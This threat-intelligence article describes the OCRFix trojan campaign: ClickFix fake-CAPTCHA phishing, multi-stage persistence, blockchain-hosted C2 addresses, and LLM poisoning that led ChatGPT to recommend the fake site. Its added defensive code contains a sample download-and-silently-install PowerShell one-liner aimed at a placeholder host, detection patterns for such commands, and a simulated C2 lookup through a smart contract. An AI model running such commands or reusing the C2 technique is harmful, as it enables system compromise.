New OCRFix Botnet Trojan Exploits Blockchain and Advanced Phishing Tactics for Stealthy System Compromise

OCRFix Botnet Trojan: A New Cyber Threat Leveraging ClickFix Phishing and EtherHiding Techniques

A newly identified threat, dubbed the OCRFix botnet trojan, combines social engineering with blockchain-hosted command infrastructure to compromise Windows systems quietly. The campaign pairs the ClickFix phishing technique, which tricks the victim into running the attacker's command themselves, with EtherHiding, which stores the command-and-control (C2) address in a smart contract on a public blockchain so that the pointer to the attacker's infrastructure cannot be taken down like an ordinary server.

Deceptive Entry Point

The attack begins at a typosquatting website, tesseract-ocr[.]com, posing as the home of the legitimate open-source Optical Character Recognition engine Tesseract OCR. Because the authentic Tesseract project is hosted on GitHub and has no dedicated website of its own, a plausible-looking domain has no real competitor for that name. The malicious site is promoted through Search Engine Optimization (SEO) poisoning and Large Language Model (LLM) poisoning; ChatGPT has been observed recommending the fraudulent site to unsuspecting users.

Phishing Mechanism

On the deceptive site, the visitor meets a fake CAPTCHA. Clicking the verification control silently writes an obfuscated PowerShell command to the clipboard, and the page then instructs the visitor to open Windows PowerShell and paste it, presenting this as a routine verification step. Because the victim runs the command in their own session, nothing passes through the browser's download protections. The command contacts a server at opsecdefcloud[.]com and retrieves a malicious MSI file (98166e51.msi) that starts the infection chain. To keep up the pretence, the victim is then redirected to the genuine Tesseract GitHub page.
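The pasted command leaves a recognisable trace in process-creation telemetry: a shell whose parent is explorer.exe and whose command line is a self-contained download-and-install one-liner. The following is an added example of a detection check for that pattern, not code from the report or from the malware; the events it scores are constructed, and the host and file names in them are placeholders rather than the campaign's indicators.

```python
"""Added example, not code from the original report: scoring process-creation
events for the ClickFix pattern this campaign relies on. A pasted payload
produces a powershell.exe whose parent is explorer.exe (the user typed or
pasted it) and whose command line is a self-contained download-and-install
one-liner. All events below are constructed; hosts and file names are
placeholders, not the campaign's indicators.
"""
import re
from dataclasses import dataclass

# (pattern, weight, label): command-line traits typical of pasted ClickFix payloads
CLICKFIX_TRAITS = [
    (r"-(?:w|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "base64-encoded command"),
    (r"\b(?:iex|invoke-expression)\b", 2, "dynamic code execution"),
    (r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl)\b",
     2, "download primitive"),
    (r"\bmsiexec(?:\.exe)?\b.*\s/(?:i|qn|quiet)\b", 2, "silent MSI install"),
    (r"-(?:nop|noprofile)\b", 1, "profile suppressed"),
    (r"-(?:ep|executionpolicy)\s+bypass", 1, "execution policy bypass"),
]
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
ALERT_THRESHOLD = 5


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_clickfix(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched traits). Non-shell processes always score 0."""
    if _basename(ev.image) not in SHELLS:
        return 0, []
    score, reasons = 0, []
    # A shell whose parent is the desktop shell was started by a human, not a service.
    if _basename(ev.parent_image) in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("shell launched from explorer.exe")
    for pattern, weight, label in CLICKFIX_TRAITS:
        if re.search(pattern, ev.command_line, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons


def is_clickfix(ev: ProcessEvent) -> bool:
    return score_clickfix(ev)[0] >= ALERT_THRESHOLD


# Constructed sample events (placeholder host and file names).
SAMPLE_EVENTS = [
    # 1: pasted ClickFix payload
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'powershell -w hidden -nop -ep bypass -c "iwr http://example.invalid/a.msi '
        r'-OutFile $env:TEMP\a.msi; msiexec /i $env:TEMP\a.msi /qn"',
    ),
    # 2: user simply opening a console
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe",
    ),
    # 3: management agent running an inventory script
    ProcessEvent(
        r"C:\Windows\CCM\CcmExec.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    ),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, why = score_clickfix(ev)
        flag = "ALERT" if score >= ALERT_THRESHOLD else "ok   "
        print(f"{flag} score={score:2d} {why}")
```

The weights are deliberately additive rather than any single trait being decisive: an admin opening a hidden console or a management agent bypassing the execution policy is routine, but a human-launched shell that hides its window, fetches a file and installs it silently in one line is the ClickFix signature. Tune the parent list and threshold to the environment before alerting on it.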

Multi-Stage Infection Process

The infection unfolds in three stages:

1. Initial Loader (Update1.exe): This component queries a smart contract on the Binance Smart Chain TestNet to obtain the current C2 address, then downloads a data.zip package from the attacker-controlled server it names and unpacks it.

2. Persistence Mechanism (setup_helper.exe): This component creates a scheduled task that runs the final payload every minute with elevated privileges, and adds the payload's paths to the Windows Defender exclusion list so they are never scanned. Both changes require administrative rights, and a task that fires every minute also makes the implant conspicuous on any host with process auditing enabled.

3. Bot Listener (CfgHelper.exe): This stage collects the victim's IP address, operating system details, device name and unique identifiers, and reports them to the bot control panel at ldture[.]com.
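Both persistence changes in stage 2 surface in standard Windows logging: a new task arrives as the task XML inside Security event 4698, and a new Defender exclusion appears as a Defender event 5007 configuration change. The following is an added example of checking both, not code from the report or the malware; the records it parses follow the shape of those events but are constructed here, and the task name, paths and binary are placeholders.

```python
"""Added example, not code from the original report: two checks for the
persistence traits attributed to setup_helper.exe, namely a scheduled task
that repeats every minute at highest privileges and a Windows Defender path
exclusion. The task XML and Defender messages below follow the shapes of
Security event 4698 and Defender event 5007 but are constructed for this
example; task names, paths and binaries are placeholders.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
MAX_INTERVAL_SECONDS = 60          # a task firing this often is rarely legitimate
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Public)\\", re.IGNORECASE)
DEFENDER_EXCLUSION = re.compile(
    r"Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\(.+?)\s*=\s*0x0",
    re.IGNORECASE)


def iso_duration_seconds(value: str) -> int:
    """Parse the ISO 8601 duration subset Task Scheduler uses (PT1M, PT30S, PT1H, P1D)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value)
    if not m or value in ("P", "PT"):
        raise ValueError(f"unsupported duration: {value}")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def suspicious_task(task_xml: str) -> list[str]:
    """Reasons a newly created task (the XML carried in event 4698) resembles OCRFix persistence."""
    root = ET.fromstring(task_xml)
    reasons = []
    for interval in root.iterfind(".//t:Repetition/t:Interval", TASK_NS):
        if iso_duration_seconds(interval.text or "") <= MAX_INTERVAL_SECONDS:
            reasons.append(f"repeats every {interval.text}")
    level = root.find(".//t:Principals/t:Principal/t:RunLevel", TASK_NS)
    if level is not None and level.text == "HighestAvailable":
        reasons.append("runs with highest available privileges")
    for cmd in root.iterfind(".//t:Actions/t:Exec/t:Command", TASK_NS):
        if USER_WRITABLE.search(cmd.text or ""):
            reasons.append(f"executes from a user-writable path: {cmd.text}")
    return reasons


def defender_exclusion_added(message: str):
    """(kind, value) when a Defender 5007 message adds an exclusion; None for removals or other changes."""
    parts = message.split("New value:", 1)
    if len(parts) < 2:
        return None
    m = DEFENDER_EXCLUSION.search(parts[1])     # only the new value, so removals do not match
    return (m.group(1), m.group(2)) if m else None


# Constructed sample records
MALICIOUS_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Repetition><Interval>PT1M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    </TimeTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions><Exec><Command>C:\ProgramData\Helper\payload.exe</Command></Exec></Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions><Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec></Actions>
</Task>"""

EXCLUSION_ADDED_MSG = (
    "Microsoft Defender Antivirus Configuration has changed.\n"
    "\tOld value: \n"
    "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ProgramData\\Helper = 0x0"
)
EXCLUSION_REMOVED_MSG = (
    "Microsoft Defender Antivirus Configuration has changed.\n"
    "\tOld value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ProgramData\\Helper = 0x0\n"
    "\tNew value: "
)

if __name__ == "__main__":
    print("malicious task:", suspicious_task(MALICIOUS_TASK_XML))
    print("benign task:   ", suspicious_task(BENIGN_TASK_XML))
    print("exclusion:     ", defender_exclusion_added(EXCLUSION_ADDED_MSG))
    print("removal:       ", defender_exclusion_added(EXCLUSION_REMOVED_MSG))
```

Event 4698 requires the "Audit Other Object Access Events" policy to be enabled, and Defender 5007 is logged in the Microsoft-Windows-Windows Defender/Operational channel; neither is collected by default in many environments, so confirm both are forwarded before relying on these checks.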

Notably, Cyrillic comments in the panel's source code hint at Russian-speaking operators, though attribution on that basis alone remains unconfirmed.

EtherHiding: Blockchain as a Command Channel

A distinctive aspect of OCRFix is its use of EtherHiding to store the C2 address. Rather than hard-coding a server address that defenders can block or sinkhole, the attackers write their C2 URL into a smart contract on the Binance Smart Chain TestNet and have the loader read it back through an ordinary read-only call to any public node. Reading a contract costs nothing and needs no wallet, and on the TestNet even writing costs only free faucet tokens, so the operators can rotate the C2 address at will without shipping a new binary. Because the stored value is replicated across every node in the network, there is no single host to seize. The flip side for defenders is that the same data is public and permanent: anyone can read the contract's current value and its transaction history to track where the campaign has pointed over time, and a loader's outbound calls to blockchain RPC endpoints are themselves an unusual network signal on most workstations.
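The mechanics of that lookup, as an added example rather than code from the report or the malware: the loader sends a JSON-RPC eth_call naming the contract and a four-byte function selector, the node returns the contract's stored string in ABI encoding, and the loader decodes it. A stand-in node is used so the example runs offline; the contract address, the selector and every URL are placeholders, not campaign data.

```python
"""Added example, not code from the original report: the mechanics of an
EtherHiding lookup. The loader POSTs a read-only `eth_call` to any public
JSON-RPC node; the node runs a view function on the attacker's contract and
returns its stored string, ABI-encoded; the loader decodes it into a C2 URL.
A stand-in node is used so this runs offline. The contract address, the
function selector and every URL below are placeholders, not campaign data.
"""
import json

WORD = 32
CONTRACT = "0x" + "ab" * 20          # placeholder contract address
SELECTOR = "0x6d4ce63c"              # assumed: 4-byte selector of a no-argument getter


def abi_encode_string(s: str) -> bytes:
    """ABI-encode a single dynamic `string` return value: offset word, length word, padded bytes."""
    data = s.encode("utf-8")
    head = WORD.to_bytes(WORD, "big")                      # offset of the tail (always 32 here)
    tail = len(data).to_bytes(WORD, "big") + data + b"\x00" * ((-len(data)) % WORD)
    return head + tail


def abi_decode_string(result_hex: str) -> str:
    """Decode an eth_call result holding one `string`; reject malformed or truncated data."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 2 * WORD:
        raise ValueError("result too short for a dynamic string")
    offset = int.from_bytes(raw[:WORD], "big")
    if offset + WORD > len(raw):
        raise ValueError("offset points outside result")
    length = int.from_bytes(raw[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(raw):
        raise ValueError("declared length exceeds result")
    return raw[start:start + length].decode("utf-8")


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> str:
    """JSON-RPC request body. A read needs no wallet, no gas and leaves nothing on chain."""
    return json.dumps({
        "jsonrpc": "2.0", "id": request_id, "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    })


class FakeRpcNode:
    """Stand-in for a public RPC node: answers eth_call for one contract from a stored string."""

    def __init__(self, contract: str, stored: str):
        self.contract = contract.lower()
        self.stored = stored

    def update(self, new_value: str) -> None:
        """Models the attacker sending a transaction that rewrites the contract's storage."""
        self.stored = new_value

    def handle(self, body: str) -> dict:
        req = json.loads(body)
        if req.get("method") != "eth_call":
            return {"jsonrpc": "2.0", "id": req.get("id"),
                    "error": {"code": -32601, "message": "unsupported method"}}
        call = req["params"][0]
        if call.get("to", "").lower() != self.contract:
            return {"jsonrpc": "2.0", "id": req["id"], "result": "0x"}   # no code at that address
        return {"jsonrpc": "2.0", "id": req["id"],
                "result": "0x" + abi_encode_string(self.stored).hex()}


def fetch_c2(node: FakeRpcNode, contract: str = CONTRACT, selector: str = SELECTOR) -> str:
    """What the loader does: ask the node, decode the answer, use it as the C2 base URL."""
    resp = node.handle(build_eth_call(contract, selector))
    if "error" in resp:
        raise RuntimeError(resp["error"]["message"])
    return abi_decode_string(resp["result"])


if __name__ == "__main__":
    node = FakeRpcNode(CONTRACT, "https://c2-one.example.invalid/")
    print("loader resolves:", fetch_c2(node))
    # Defenders sinkhole the first host; the attacker simply rewrites the contract.
    node.update("https://c2-two.example.invalid/")
    print("after rotation: ", fetch_c2(node))
```

The same decoder serves defenders: point a real eth_call at the contract named in a sample (the selector comes from the loader's request data) and the current C2 falls out, and replaying the contract's past transactions yields every address it has pointed to.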

Implications and Recommendations

The OCRFix campaign shows how social engineering and evasion techniques are now combined in a single delivery chain. To reduce the risk, organizations and individuals should:

– Verify Sources: Check the authenticity of a website before downloading software from it. For an open-source project, locate its official repository or package registry rather than trusting a search result or a chatbot's answer.

– Exercise Caution with Commands: Never paste a command copied from a web page into PowerShell, the Run dialog or a terminal. No legitimate CAPTCHA or verification step requires this, and a pasted command runs with all of the user's privileges.

– Implement Robust Security Measures: Deploy endpoint protection that can follow a multi-stage infection, and alert on the chain's observable steps: a shell spawned from explorer.exe with a download one-liner, a new scheduled task that repeats every minute, and new Windows Defender exclusions. Where standard users have no need for PowerShell, restrict it with application control.

– Stay Informed: Track emerging tactics such as ClickFix and EtherHiding so that detection and response playbooks keep pace with them.

By adopting these practices, users can better defend against campaigns like OCRFix, which exploit trust in familiar tools and web pages rather than any software flaw to achieve their goals.